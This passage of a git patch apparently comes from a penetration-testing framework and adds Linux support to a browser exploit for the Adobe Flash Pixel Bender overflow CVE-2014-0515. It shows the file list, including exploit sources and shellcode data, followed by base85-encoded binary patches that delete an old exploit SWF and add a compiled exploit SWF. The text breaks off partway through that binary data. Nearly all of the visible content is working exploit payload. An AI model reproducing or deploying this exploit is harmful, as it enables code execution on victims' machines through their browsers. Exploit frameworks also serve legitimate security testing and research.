From 8ed13b1d1b0ee5da43891c478e584168210c48dc Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Thu, 11 Jun 2015 16:18:50 -0500
Subject: [PATCH] Add linux support for CVE-2014-0515

---
 data/exploits/CVE-2014-0515/Graph.swf         | Bin 4943 -> 0 bytes
 data/exploits/CVE-2014-0515/msf.swf           | Bin 0 -> 21561 bytes
 external/source/exploits/CVE-2014-0515/Elf.as | 235 ++++++++++
 .../source/exploits/CVE-2014-0515/Exploit.as  | 140 ++++++
 .../CVE-2014-0515/ExploitByteArray.as         |  85 ++++
 .../exploits/CVE-2014-0515/ExploitVector.as   |  74 ++++
 .../exploits/CVE-2014-0515/Exploiter.as       | 399 +++++++++++++++++
 .../source/exploits/CVE-2014-0515/Graph.as    | 411 ------------------
 .../exploits/CVE-2014-0515/GraphShadLinux.as  |  10 +
 .../CVE-2014-0515/GraphShadWindows.as         |  10 +
 .../exploits/CVE-2014-0515/Graph_Shad.as      |  10 -
 .../source/exploits/CVE-2014-0515/Logger.as   |  32 ++
 external/source/exploits/CVE-2014-0515/PE.as  |  72 +++
 .../exploits/CVE-2014-0515/binary_data_linux  | Bin 0 -> 2425 bytes
 .../{binary_data => binary_data_windows}      | Bin
 .../browser/adobe_flash_pixel_bender_bof.rb   | 149 +++++++
 .../browser/adobe_flash_pixel_bender_bof.rb   |  50 +--
 17 files changed, 1221 insertions(+), 456 deletions(-)
 delete mode 100755 data/exploits/CVE-2014-0515/Graph.swf
 create mode 100644 data/exploits/CVE-2014-0515/msf.swf
 create mode 100644 external/source/exploits/CVE-2014-0515/Elf.as
 create mode 100755 external/source/exploits/CVE-2014-0515/Exploit.as
 create mode 100644 external/source/exploits/CVE-2014-0515/ExploitByteArray.as
 create mode 100644 external/source/exploits/CVE-2014-0515/ExploitVector.as
 create mode 100644 external/source/exploits/CVE-2014-0515/Exploiter.as
 delete mode 100755 external/source/exploits/CVE-2014-0515/Graph.as
 create mode 100755 external/source/exploits/CVE-2014-0515/GraphShadLinux.as
 create mode 100755 external/source/exploits/CVE-2014-0515/GraphShadWindows.as
 delete mode 100755 external/source/exploits/CVE-2014-0515/Graph_Shad.as
 create mode 100755 external/source/exploits/CVE-2014-0515/Logger.as
 create mode 100644 external/source/exploits/CVE-2014-0515/PE.as
 create mode 100755 external/source/exploits/CVE-2014-0515/binary_data_linux
 rename external/source/exploits/CVE-2014-0515/{binary_data => binary_data_windows} (100%)
 create mode 100644 modules/exploits/multi/browser/adobe_flash_pixel_bender_bof.rb

diff --git a/data/exploits/CVE-2014-0515/Graph.swf b/data/exploits/CVE-2014-0515/Graph.swf
deleted file mode 100755
index aa30c2421e2ed20fe89b98f880289bffe90aae6c..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 4943
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
NaUZoJ{{zmB|L_W;W}*N9

diff --git a/data/exploits/CVE-2014-0515/msf.swf b/data/exploits/CVE-2014-0515/msf.swf
new file mode 100644
index 0000000000000000000000000000000000000000..06505fbe4baf63c80bb00ff2d8675c02f1111274
GIT binary patch
literal 21561
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
